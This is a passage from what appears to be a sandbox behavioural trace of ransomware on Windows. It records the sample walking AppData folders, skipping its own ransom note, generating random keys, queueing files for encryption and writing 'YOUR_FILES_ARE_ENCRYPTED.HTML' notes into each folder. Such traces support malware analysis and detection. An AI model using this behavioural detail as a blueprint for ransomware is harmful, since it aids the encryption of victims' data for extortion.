dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.867] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.867] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.867] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\roaming.lock") returned 107 [0121.867] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.867] lstrlenW (lpString=".lock") returned 5 [0121.867] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.867] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9562f21c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9562f21c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.867] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.867] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat") returned 107 [0121.867] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.867] lstrlenW (lpString=".dat") returned 4 [0121.867] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.867] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0121.867] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.867] GetProcessHeap () returned 0x600000 [0121.867] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.870] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="1D") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="09") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="54") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="84") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="30") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="17") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="38") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="69") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="09") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="90") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="86") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="86") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="9B") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="0D") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="4F") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="4F") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="8E") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="DB") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="45") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="85") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="74") returned 2 [0121.870] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="43") returned 2 [0121.870] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="80") returned 2 [0121.870] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="29") returned 2 [0121.870] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="EA") returned 2 [0121.870] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="AF") returned 2 [0121.870] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="29") returned 2 [0121.870] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="2F") returned 2 [0121.870] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="52") returned 2 [0121.870] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="84") returned 2 [0121.870] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="1B") returned 2 [0121.870] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="22") returned 2 [0121.871] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat" [0121.871] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.871] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.871] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9554a342, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9554a342, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9554a342, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0121.871] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.871] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 112 [0121.871] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.871] lstrlenW (lpString=".LOG1") returned 5 [0121.871] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.871] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9554a342, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9554a342, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9554a342, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0121.871] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.871] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 112 [0121.871] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.871] lstrlenW (lpString=".LOG2") returned 5 [0121.871] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.871] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9554a342, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9554a342, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9554a342, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0121.871] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.872] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0121.872] GetProcessHeap () returned 0x600000 [0121.872] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.872] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.873] CloseHandle (hObject=0x31c) returned 1 [0121.873] GetProcessHeap () returned 0x600000 [0121.873] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.873] GetProcessHeap () returned 0x600000 [0121.873] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.873] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.873] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.873] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData") returned 99 [0121.873] GetProcessHeap () returned 0x600000 [0121.873] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.874] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData" [0121.874] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData\\*" [0121.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0121.874] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.874] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab409029, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab409029, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab409029, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 0 [0121.874] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0121.874] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0121.874] GetProcessHeap () returned 0x600000 [0121.874] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.881] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.881] CloseHandle (hObject=0x338) returned 1 [0121.882] GetProcessHeap () returned 0x600000 [0121.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.882] GetProcessHeap () returned 0x600000 [0121.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.882] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.882] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.882] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState") returned 95 [0121.882] GetProcessHeap () returned 0x600000 [0121.882] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.883] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState" [0121.883] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState\\*" [0121.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0121.883] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.883] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab396ad7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab396ad7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab396ad7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 0 [0121.883] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0121.883] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.883] GetProcessHeap () returned 0x600000 [0121.883] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.purchasedialog_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.884] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.885] CloseHandle (hObject=0x338) returned 1 [0121.886] GetProcessHeap () returned 0x600000 [0121.886] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.886] GetProcessHeap () returned 0x600000 [0121.886] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.886] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.0_N")) returned 1 [0121.886] StrStrIW (lpFirst="Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.886] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy") returned 146 [0121.886] GetProcessHeap () returned 0x600000 [0121.886] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.887] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy" [0121.887] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\*" [0121.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName=".", cAlternateFileName="")) returned 0x626878 [0121.887] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="..", cAlternateFileName="")) returned 1 [0121.887] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabc1516c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xabc1516c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31884bc, dwReserved1=0x3188410, cFileName="ActivationStore", 